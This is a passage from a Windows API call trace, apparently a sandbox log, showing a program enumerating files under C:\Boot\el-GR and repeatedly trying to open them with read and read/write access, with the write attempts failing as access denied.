Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.364] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0069.364] AreFileApisANSI () returned 1 [0069.364] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\el-GR", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\el-GR", lpUsedDefaultChar=0x0) returned 14 [0069.364] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.364] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.364] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0069.364] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0069.364] AreFileApisANSI () returned 1 [0069.364] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0069.365] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1c) returned 0x88748 [0069.365] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x88748, cchWideChar=14 | out: lpWideCharStr="C:\\Boot\\el-GR") returned 14 [0069.365] CreateFileW (lpFileName="C:\\Boot\\el-GR" (normalized: "c:\\boot\\el-gr"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0069.365] GetLastError () returned 0x5 [0069.365] GetLastError () returned 0x5 [0069.365] SetLastError (dwErrCode=0x5) [0069.365] GetLastError () returned 0x5 [0069.365] SetLastError (dwErrCode=0x5) [0069.365] GetLastError () returned 0x5 [0069.365] SetLastError (dwErrCode=0x5) [0069.365] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0069.365] AreFileApisANSI () returned 1 [0069.365] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0069.365] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1c) returned 0x88810 [0069.365] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x88810, cchWideChar=14 | out: lpWideCharStr="C:\\Boot\\el-GR") returned 14 [0069.365] CreateFileW (lpFileName="C:\\Boot\\el-GR" (normalized: "c:\\boot\\el-gr"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0069.365] GetLastError () returned 0x5 [0069.365] GetLastError () returned 0x5 [0069.365] SetLastError (dwErrCode=0x5) [0069.365] GetLastError () returned 0x5 [0069.365] SetLastError (dwErrCode=0x5) [0069.365] GetLastError () returned 0x5 [0069.365] SetLastError (dwErrCode=0x5) [0069.365] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0069.366] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0069.366] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0069.366] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.366] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.366] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.366] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.366] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0069.366] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0069.366] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0069.366] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc482dc87, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc482dc87, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="en-GB", cAlternateFileName="")) returned 1 [0069.366] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0069.366] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0069.366] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0069.366] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0069.366] FindFirstFileExW (in: lpFileName="C:\\Boot\\el-GR\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78090 [0069.366] FindNextFileW (in: hFindFile=0x78090, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef555ff8, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef555ff8, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0069.366] FindNextFileW (in: hFindFile=0x78090, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc482dc87, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x209949ab, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x13960, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0069.366] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0069.366] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0069.366] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0069.366] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0069.366] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0069.366] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0069.366] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0069.366] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0069.366] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0069.366] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0069.366] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0069.366] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46668 [0069.367] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0069.367] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0069.367] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0069.367] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0069.367] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0069.367] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0069.367] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0069.367] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0069.367] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0069.367] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0069.367] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0069.367] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0069.367] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0069.367] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0069.367] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0069.367] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0069.367] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0069.367] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.367] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.367] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.367] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.367] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0069.367] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0069.367] AreFileApisANSI () returned 1 [0069.367] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\el-GR\\bootmgr.exe.mui", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\el-GR\\bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 30 [0069.367] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0069.367] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.367] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.367] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0069.367] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0069.367] AreFileApisANSI () returned 1 [0069.368] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88518, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0069.368] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x53640 [0069.368] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88518, cbMultiByte=-1, lpWideCharStr=0x53640, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\el-GR\\bootmgr.exe.mui") returned 30 [0069.368] CreateFileW (lpFileName="C:\\Boot\\el-GR\\bootmgr.exe.mui" (normalized: "c:\\boot\\el-gr\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0069.368] GetFileType (hFile=0x41c) returned 0x1 [0069.368] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0069.368] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0069.368] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0069.368] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0069.368] CloseHandle (hObject=0x41c) returned 1 [0069.369] AreFileApisANSI () returned 1 [0069.369] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88518, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0069.369] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x536d0 [0069.369] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88518, cbMultiByte=-1, lpWideCharStr=0x536d0, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\el-GR\\bootmgr.exe.mui") returned 30 [0069.369] CreateFileW (lpFileName="C:\\Boot\\el-GR\\bootmgr.exe.mui" (normalized: "c:\\boot\\el-gr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0069.369] GetLastError () returned 0x5 [0069.369] GetLastError () returned 0x5 [0069.369] SetLastError (dwErrCode=0x5) [0069.369] GetLastError () returned 0x5 [0069.369] SetLastError (dwErrCode=0x5) [0069.369] GetLastError () returned 0x5 [0069.369] SetLastError (dwErrCode=0x5) [0069.369] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0069.369] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0069.369] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0069.369] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0069.369] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.369] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.369] FindNextFileW (in: hFindFile=0x78090, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc482dc87, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef555ff8, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf3a246aa, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb5a0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0069.369] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0069.369] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0069.369] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0069.369] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0069.369] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0069.369] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0069.370] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0069.370] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0069.370] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0069.370] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0069.370] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0069.370] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0069.370] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0069.370] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0069.370] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0069.370] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0069.370] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0069.370] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0069.370] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0069.370] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0069.370] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0069.370] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0069.370] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0069.370] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0069.370] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.370] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.370] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.370] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.370] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0069.370] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0069.370] AreFileApisANSI () returned 1 [0069.370] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\el-GR\\memtest.exe.mui", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\el-GR\\memtest.exe.mui", lpUsedDefaultChar=0x0) returned 30 [0069.370] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0069.370] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.370] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.370] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0069.370] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0069.371] AreFileApisANSI () returned 1 [0069.371] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0069.371] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x53718 [0069.371] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x53718, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\el-GR\\memtest.exe.mui") returned 30 [0069.371] CreateFileW (lpFileName="C:\\Boot\\el-GR\\memtest.exe.mui" (normalized: "c:\\boot\\el-gr\\memtest.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0069.532] GetFileType (hFile=0x418) returned 0x1 [0069.532] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53718 | out: hHeap=0x20000) returned 1 [0069.532] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0069.532] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0069.533] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0069.533] CloseHandle (hObject=0x418) returned 1 [0069.533] AreFileApisANSI () returned 1 [0069.533] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0069.533] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x53370 [0069.533] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x53370, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\el-GR\\memtest.exe.mui") returned 30 [0069.533] CreateFileW (lpFileName="C:\\Boot\\el-GR\\memtest.exe.mui" (normalized: "c:\\boot\\el-gr\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0069.533] GetLastError () returned 0x5 [0069.533] GetLastError () returned 0x5 [0069.533] SetLastError (dwErrCode=0x5) [0069.533] GetLastError () returned 0x5 [0069.533] SetLastError (dwErrCode=0x5) [0069.533] GetLastError () returned 0x5 [0069.533] SetLastError (dwErrCode=0x5) [0069.533] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0069.533] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0069.533] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0069.533] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0069.533] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.534] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.534] FindNextFileW (in: hFindFile=0x78090, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x3a, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x68f48, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x3a, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓떠")) returned 0 [0069.534] FindClose (in: hFindFile=0x78090 | out: hFindFile=0x78090) returned 1 [0069.534] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0069.534] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f668 [0069.534] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0069.534] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f668 | out: hHeap=0x20000) returned 1 [0069.534] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0069.534] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0069.534] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0069.534] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0069.534] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0069.534] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46668 | out: hHeap=0x20000) returned 1 [0069.534] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0069.534] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0069.534] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0069.534] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0069.534] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0069.534] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0069.534] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0069.534] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: 